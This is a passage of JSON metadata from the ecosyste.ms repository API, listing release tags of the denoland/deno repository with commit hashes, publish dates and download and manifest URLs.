/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https: